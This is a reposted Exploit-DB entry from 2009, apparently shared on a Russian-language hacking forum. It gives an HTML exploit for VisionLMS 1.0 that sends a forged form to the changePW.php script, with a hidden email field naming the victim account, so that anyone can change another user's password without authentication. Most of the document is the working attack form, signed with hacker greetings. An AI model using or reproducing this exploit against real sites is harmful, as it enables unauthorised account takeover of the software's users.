Exploit VisionLms 1.0 - 'changePW.php' Remote Password Change

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8557
Проверка EDB
  1. Пройдено
Автор
MR.TRO0OQY
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-04-28
HTML:
<html>
<head>
<title>VisionLMS 1.0 | Change Password</title>



  <p>* VisionLMS 1.0 Remote Password Change<br>
  * Coded by Mr.tro0oqy<br>
  * E-mail t.4@windowslive.com ---&lt; Yemeni hacker<br>
  * Greetz All my Friends<br>
&nbsp;</p>



  <form enctype="multipart/form-data" method="post" name="form" action="http://visionlms.com/demo/changePW.php">
  <div style="font-weight:bold; color:#CC3300; padding:15;"></div>
   
  <div style="float:left; padding-left:15px; clear:both;"><input type="password" name="Password" value="" /></div>
  <div style="float:left; padding-left:20px;">
  <input type="hidden" name="EmailAddress" value="support@visionlms.com" />
  <input type="submit" name="submit" value="Change Password" onclick="return validateForm()" />
  </div>
  </form>
  </div> <!--END Activity DIV-->

 </div> <!--END Body DIV-->
  

 <!--START FOOTER NAVIGATION-->
 <!--<div id="Footer" class='Footer'>kjkjkj</div>-->
 <!--END FOOTER NAVIGATION-->








</body>
</html>

# milw0rm.com [2009-04-28]
 
Источник
www.exploit-db.com

Похожие темы